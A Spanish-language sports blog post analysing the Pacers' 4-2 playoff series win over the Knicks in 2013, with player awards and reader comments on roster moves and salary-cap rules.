Análisis New York Knicks 2 – Indiana Pacers 4

21 de May de 2013 por Esteban

pacers

Vaya yerro en el análisis previo, donde dábamos un 4-2 a favor de los Knicks. En mi defensa, debo decir que esperaba una serie mucho más igualada en los marcadores finales, es decir, partidos tan cerrados que se resolvieran en el último minuto. Allí, la ausencia de un definidor de juegos por parte de los Pacers y la presencia de Carmelo Anthony para los Knicks se me antojaban decisivas.

La cuestión es que no fue así. Los Pacers ganaron todos sus juegos por un promedio de 10 puntos, mientras que los dos de los Knicks fueron uno por goleada y otro por 10 puntos. No hubo clutch para que Melo se luciera o para que los Pacers se quedaran sin tiros.

Por otra parte hay cierta tranquilidad al pensar que las claves de la serie se dieron en buena cantidad. Lo decíamos y lo verificamos: el juego interior de Indiana sería demasiado para el de lo Knicks, y el tamaño de los Pacers obligaría a New York a jugar de otra manera. Woodson lo vio y salió en un juego con Martin de titular, pero el remedio fue peor que la enfermedad. Sin Prigioni el equipo jugó peor y Martin no fue de gran ayuda para parar a Hibbert, quien se hizo el dueño de los aros.

knicks¿La clave de la serie? Los rebotes. Pocas veces se ha visto una superioridad tan apabullante en ese apartado en una serie de segunda ronda. La superioridad de tamaño de Indiana hacía sonrojar a sus hinchas y pensar en emparejamientos de Hill-Felton, Stephenson-Prigioni, George-Shumpert, West-Anthony y Hibbert-Chandler era simplemente abusivo. El regreso de Studemire de poco sirvió, y a mi impresión muy útiles habrían resultado tanto Wallace como Thomas (a pesar de tener 40 años ambos).

Decíamos también que la serie se decantaría por el Melo bueno y el Melo malo, y en parte fue así. En los dos juegos ganados por los Knicks, el #7 la rompió, aunque en el sexto, a pesar de sus 39 puntos, su equipo fue eliminado.

Venció el mejor equipo, por defensa en conjunto, esfuerzo grupal y jugadas prediseñadas para explotar las pocas virtudes ofensivas que tenían. Los Knicks murieron con la suya, vencieron a Boston a base de tiros difíciles y toma de decisiones dudosas de Melo y Smith, y repitieron la formula aunque con resultado diverso.

Se termina la temporada para los Knicks, soñada en la temporada regular según mi punto de vista, donde pocas cosas pudieron salirle mejor, y algo decepcionante en Playoffs. Sin amnistía para Stoudemire, con la renovación a la vista de Smith, y los años pesándoles cada vez mas a Kidd, Prigioni, Camby y los ya ausentes con contratos mínimos Wallace, Thomas y ¿Martin? Da la impresión que han dejado pasar el tren. Era éste o ¿ninguno?

melo hibbertPREMIOS

MVP: Qué difícil elegir un solo Pacer. Como muestra del equipo que son, ha habido un MVP para cada partido: en el juego 1, David West destruyó a Carmelo, lo cargó de faltas y de ese modo ganó medio partido. En el juego 3, se hizo gigante Roy Hibbert con 24 puntos y 12 rebotes, dominando como los viejos centers de la NBA. En el casi definitorio juego 4, George Hill fue la estrella con 26 puntos, y en el juego 6, Stephenson la rompió con 25 puntos y 10 rebotes, comandando a su equipo a la victoria de la serie. Durante todos estos juegos y en las derrotas, Paul George volvió a marcarse una gran serie con promedios de 19.5 puntos, 7 rebotes y 5 asistencias. Brutal. Igualmente, por lo que generó el MVP termina siendo Hibbert. Sin promedios estratosféricos, su presencia y su victoria apabullante en el duelo contra uno de los mejores pívots defensivos de la liga resultaron clave.

Rookie: Cómo no nombrar a Pablo Prigioni. A los 34 años, se marcó 5 de 6 juegos de titular en segunda ronda de Playoffs. Gran año para el veterano base que demuestra que la NBA es un mundo aparte, donde jugadores de rol siempre tendrán un lugar. Chris Copeland también tuvo sus minutos y mostró que puede tener cierta utilidad.

Sorpresa: Si bien venía siendo titular toda la temporada, nadie esperaba una serie así de Lance Stephenson; aposté por él en mi análisis previo de la temporada y vaya si acerté. Partidos de 13 rebotes y hasta 25 puntos superan las expectativas de su propia madre. DJ Augustin, después de un año para el olvido, se acordó de jugar en el momento justo y tuvo un aporte más que importante en esta serie.

Decepción: ¿Por quién empiezo? Todos los Knicks: Woodson no le encontró la vuelta a los Pacers, que se sabía que apostarían a destruir a los Knicks bajo los aros, ni hablar de Kidd y Camby, que van camino al retiro a pesar de sus largos contratos, y hasta Melo, que se queda en segunda ronda y hace dudar aún más de su capacidad de liderazgo. Pero el premio es para Chandler. Se dice que ha estado con problemas de salud, y quizá sea eso, pero ha sido superado en todo sentido por Hibbert, que ha puesto a prueba su fama de gran defensor y lo ha dejado expuesto totalmente.

Esfuerzo en vano: ¿Quién sino Carmelo Anthony? Alternando buenas y malas, ha dado todo de sí, pero no ha sido suficiente. Los 39 puntos en la derrota en el juego 6 son la mejor explicación de su serie.

15 comentarios a esta entrada

1. Simon dice:
    #1

Simon:
    Yo voy a decir un 4-2 para Pacers… Robarán el primero en el Madison y después se limitarán a ganar sus partidos en casa.

Este comentario es del análisis. Acerté de pleno jejejejejejej
    Buen artículo Esteban. El último parrafo antes de los premios es algo en lo que yo no había caído pero si… o hacen algún movimiento milagro o este equipo está condenado a ir bajando poco a poco ( y eso que acaban de llegar )

2. Vader dice:
    #2

Aunque sea duro la verdad es que el próximo año será de transición para los Knicks. Hasta el final de la temporada siguiente que el contrato de Stat será un expiring no podemos hacer gran cosa… Con Stat sano y por supuesto con Chandler a tope quien sabe lo que hubieramos podido hacer. En el estado actual nos han hipotecado, y aunque confio en que Chandler vuelva a tope el año que viene no podemos esperar lo mismo de Stat.

Saludos!!

3. Sancho88 dice:
    #3

Buen análisis Esteban. Está claro que Hibbert ha condicionado toda la eliminatoria en ambos tableros y los Knicks no han encontrado la forma de pararlo. Como bien dices, Chandler no ha estado a la altura, y los Knicks lo han pagado. Carmelo ha hecho lo que ha podido el hombre, pero Pacers tienen una gran unión como equipo y no se dejan amedrentar solo por un jugador. Ha faltado dirección, Felton tampoco ha estado, al igual que Chandler, y por ahí se le ha escapado la eliminatoria a NY. Aún así, épico para mí llegar al sexto partido para NY con opciones en el último cuarto de empatar la serie y llevarla de vuelta al Madison. Creo que al resumen solo le falta hablar un poco sobre la aportación de Iman Shumpert. Sus números no son espectaculares pero aporta mucho para Nueva York. En mi opinión, el backourt de los Knicks está muy bien, sobre todo el puesto de escolta y alero. Con Shumpert y JR ahí, más Carmelo y Copeland de aleros, lo tienen bien para el año que viene. Luego, en bases, estaría bien volver a ver a Prigioni un año más, ya que Kidd es muy probable que se retire (pienso yo). Pero NY no sé como lo tienen en el aspecto salarial, pero Calderón creo que les vendría de perlas, y luego en el poste tienen que darle mas minutos e importancia a Stat.

Lo de Melo de 4 funciona a veces pero no siempre, siempre será mejor jugar de inicio con dos postes all star como Stat y Chandler, y liberar a Melo en ataque y en defensa, vamos, pienso yo.

Felton-Shumpert-Melo-Stat-Chandler como cinco de inicio para el año que viene… yo los sigo viendo como aspirantes a todos eh? no enterremos antes de tiempo a esta nueva generación Knick.

Ahora hablan de la operacion de Melo, alguien sabe algo mas?

4. Sancho88 dice:
    #4

O sea, Melo ha rendido bien de 4 teniendo en cuenta que Stat estaba lesionado y tal, pero se supone que con Amare sano el año que viene, los roles volverán a ser los del año pasado no? Melo de 3, o como lo veis vosotros. No pensáis que Melo jugando de 4 se tiene que desgastar mucho en defensa?

5. GreenPride dice:
    #5

Eliminatoria en la que se ha demostrado que a veces el tamaño sí importa…. Los Pacers simplemente han apisonado físicamente a los Knicks, ganándoles en ambos tableros y cerrándoles todos los caminos a su aro. Esto ha dejado a los Knicks en manos únicamente de sus lanzadores y muchos de ellos no han estado a la altura. Con Kidd prácticamente desaparecido, JR horrible y Felton no demasiado acertado los Knicks han tenido hasta que recurrir a Copeland para intentar poder sumar puntos más allá de Melo. En el otro lado y con sus limitaciones conocidas los Pacers han sido un grupo mucho más coral. Han sabido manejar las situaciones y aprovechar su gran ventaja física para conseguir tiros abiertos y segundas opciones que han matado a los Knicks.
    Hibbert&West han sido un martillo pilón y el resto lo ha hecho su defensa y las buenas rachas un día de Hill, otro de Stephenson, otro de George incluso alguna de Augustine.
    Sin duda, ahora se abre el momento de reflexión para New York. Con una plantilla en la no menos de 5 o 6 jugadores no están precisamente en su mejor momento o a punto de retirarse ¨(Kidd, Sheed, Kurt Thomas, Camby, Stoudamire e incluso Prigioni) toca el momento de ver por donde tirar. Lo normal sería intentar deshacerse del mayor número de ellos (lo de Stat les condiciona mucho) e intentar formar equipo con la base Felton-Shumpert-Melo-JR-Chandler. Veremos si la economía se lo permite.
    Para los Pacers toca su mayor desafío. Este año parecen más equipo pero ahora toca el rival… Los Heat son el enemigo a batir por todos y los Pacers en principio tienen armas para intentar hacerles lo mismo que a los Knicks, a saber matarles por dentro con West&Hibbert e intentar dominar los partidos a partir de su dominio en el rebote y el juego interior. Ya veremos si lo consiguen o si su falta de un líder para anotar cuando las cosas se complican les pasa mucha factura

6. Jose Luis dice:
    #6

A ver cuando nos enteramos de que Chandler no es un gran jugador defensivo en 1 vs 1… es un jugador de defensa zonal. No tiene muchos kilos para lo alto que es, como para aguantar un posteo a Hibbert. Si bien es alto, lo que mejor hace es jugar en defensa zonal y desde ahí dirigir y mandar, y estar bajo el aro para evitar penetraciones. Fue esta defensa en la final de los PO que ganó Mavericks la que le ha dado esta fama, y hace más por defensa en equipo, en plan de dirigir, animar, centrar a sus compañeros y cerrar la zona, que en defender ese 1 vs 1 que tanto ha sufrido con Hibbert.

7. Esteban dice:
    #7

Muxha razon tienes jose luis, detalle al q no se le ha prestado demasiada atencion

8. Vader dice:
    #8

Anda que no me he acordado este año de que no hace tanto por los Knicks pasaron David Lee, Zach Randolp o Jamal Crawford…

Felton, Shumpert, Melo y Chandler son buenas piezas. JR Smith si se queda también esta bien porque se quedará a buen precio o se tendrá que ir (los Knicks como máximo le podrán pagar unos 5,5 millones). A partir de aquí y como he dicho antes hasta que Stat sea expiring no se podrá mejorar mucho el equipo. Llegando sanos el año que viene podemos aspirar como mucho a la final de conferencia.

Saludos

9. melo15 dice:
    #9

Bueno la base no es tan mala.
    Felton es un buen base, no un all-star pero si uno bastante solido.
    Shumpert es un pedazo de defensor que solo ha de trabajar un poco el tiro (muy irregular)
    Melo es el que es
    Chandler no ha jugado nada bien esta ronda contra los Pacers, pero es verdad que lleva arrastrando lesiones des de que se acabo la regular.
    Los Knicks dependen de Stat, si vuelve sin lesiones y en forma, el aún es un gran jugador en ataque.

El banquillo esta bastante bien, Prigioni, Copeland, Novak mas JR y Martin que ya han dicho que se van a quedar.
    Yo pescaría algo para la posicione de base-escolta y ya esta.

10. Esteban dice:
    #10

es verdad melo, no tienen tan mal base, pero lo cierto es que dificilmente sean mejores que este año, solo stat volviendo a un nivel superior al de los ultimos dos años puede darles un toque que los lleve a un nivel o ronda mas
    en otro caso quedaran como un equipo de segunda ronda

tan imposible es conseguir un comprador para stat? orlando podria estar interesado y entregar a afflalo, nelson y davis, lo que le daria una banca de super lujo a los Knikcs, mientras orlando conseguiria una estrella, aunque en decadencia, podria ayudar a un equipo que se base en harris, vucevic y algun escolta de este draft

11. Simon dice:
    #11

Si por Stoudemire sacan a Afflalo, Nelson y Davis o algun paquete de jugadores del mismo nivel yo dejo de seguir la NBA… directamente sin medias tintas.

12. Vader dice:
    #12

Nada, Stat es intraspasable ahora mismo. Su salario es muy alto y ademas juega con limitacion de minutos, etc… Seria una locura para cualquier GM fichar a Stat. No se podra hacer hasta que sea expiring…

13. Vader dice:
    #13

Lo único que se me ocurre, aunque improbable seria traspasar a Stat + ronda o rondas a un equipo que tuviera aún posibilidad de amnistia. ¿A cambio de que? Ni idea… No vale la pena ni plantearselo porque los Knicks lo aguantaran como mínimo un año más.

Saludos

14. MagicJohnson32 dice:
    #14

Vader:

Saludos

Ni así, Vader. Para que un jugador sea ‘elegible’ de cara a la amnistía, ni puede haber sido traspasado ni haber firmado un nuevo contrato desde final de la temporada 2011.

15. Simon dice:
    #15

Exacto, el único equipo que puede amnistiar a Stoudemire es New York. El problema es que con la posible renovación de JR Smith… que mínimo se irá a los 5 millones (como poco) a los Knicks aún dandole la amnistía a Amare, seguirían por encima del límite ( por poquito ) y no podrían firmar a nadie en agencia libre, todo sería por traspaso, asi que estarían en las mismas. Por eso creo que lo mejor es mantenerlo ( a los knicks pagar el impuesto de lujo se la pela ) hasta que sea expiring y ahí si que podrían sacar algo bueno por el.